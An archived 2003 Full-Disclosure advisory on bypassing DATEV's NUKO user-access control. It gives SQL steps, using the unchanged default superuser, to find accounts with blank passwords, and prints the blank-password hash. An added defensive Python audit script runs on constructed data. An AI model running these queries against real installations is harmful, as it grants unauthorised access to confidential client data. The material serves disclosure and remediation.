[Full-Disclosure] (no subject)

t4rku5hushmail.com
Date: Fri Oct 31 2003 - 07:20:28 CST


Topic: DATEV Nutzungskontrolle Bypassing

Release Date: 2003-10-31

Affected system:
================

- Nutzungskontrolle V.2.2
- Nutzungskontrolle V.2.1

Unaffected system:
==================

- none known

Summary:
========

DATEV eG is a German company that makes software for tax advisors and
lawyers. The Nutzungskontrolle (NUKO) is software that restricts
access for users. For example, a normal user is not allowed to see
the internal reward accounting data. This data is restricted by the
NUKO by, for example, blocking the "advisor number", which is used for
all data in the internal reward accounting.

Issue:
======

It is possible to find out simple or blank passwords in the NUKO by
searching in the NUKO database.

The problem is that DATEV changed the default database password for all
their databases, except for the NUKO DB. At the moment the Sybase ASA
database is used to manage this stuff. I will not write the login
password down here, because I think it is no problem to find this with
Google.

1. First you have to add the default superuser to the group DATEV:

example:

GRANT MEMBERSHIP
IN GROUP DATEV
TO "the superuser login" (without "")

2. Then just query the table u_nkw_passwords on the column nk_password
to find where the password hash

3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D

occurs.

example:

select nk_user_id from u_nkw_passwords where nk_password =
'3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D'

3. Now query the user name of the nk_user_id.

example:

select nk_user_name from u_nkw_users where nk_user_id = 'one of the userid from 2.'

4. Now you have a NUKO login with a blank Password.

Workaround:
===========

Change the default database password.

Credits:
========

Discovered by t4rku5
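
For administrators applying the workaround, the following is an added example (not part of the original post, and not DATEV code) that audits the two tables named above for accounts still carrying the blank-password hash, and for accounts whose hashes are identical. It assumes an in-memory SQLite database as a stand-in for Sybase ASA, TEXT column types, and that the hashes are unsalted (suggested by the post giving one hash for every blank password); all rows are constructed.

```python
import sqlite3
from collections import defaultdict

# Hash the advisory gives for a blank NUKO password: one 8-byte block, four times.
BLANK_HASH = "3D7595A98BFF809D" * 4


def build_sample_db():
    """SQLite stand-in for the NUKO tables. Column types and rows are constructed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE u_nkw_users (nk_user_id TEXT PRIMARY KEY, nk_user_name TEXT);
        CREATE TABLE u_nkw_passwords (nk_user_id TEXT, nk_password TEXT);
    """)
    db.executemany("INSERT INTO u_nkw_users VALUES (?, ?)",
                   [("1", "alice"), ("2", "bob"), ("3", "carol"), ("4", "dave")])
    db.executemany("INSERT INTO u_nkw_passwords VALUES (?, ?)",
                   [("1", BLANK_HASH), ("2", "A1" * 32),
                    ("3", "a1" * 32), ("4", "0F" * 32)])
    return db


def audit(db):
    """Return (users with a blank password, groups of users sharing one hash)."""
    rows = db.execute("""
        SELECT u.nk_user_name, p.nk_password
        FROM u_nkw_passwords AS p
        JOIN u_nkw_users AS u ON u.nk_user_id = p.nk_user_id
        ORDER BY u.nk_user_name
    """).fetchall()
    by_hash = defaultdict(list)
    for name, pw_hash in rows:
        by_hash[pw_hash.upper()].append(name)  # compare hex case-insensitively
    blank = by_hash.pop(BLANK_HASH, [])
    # Assumption: unsalted hashes, so an identical hash means an identical password.
    shared = sorted(names for names in by_hash.values() if len(names) > 1)
    return blank, shared


if __name__ == "__main__":
    blank, shared = audit(build_sample_db())
    print("accounts that need a password set:", blank)
    print("accounts sharing a password:", shared)
```

Accounts in the first list need a password set; accounts in the second should each be given their own.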

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html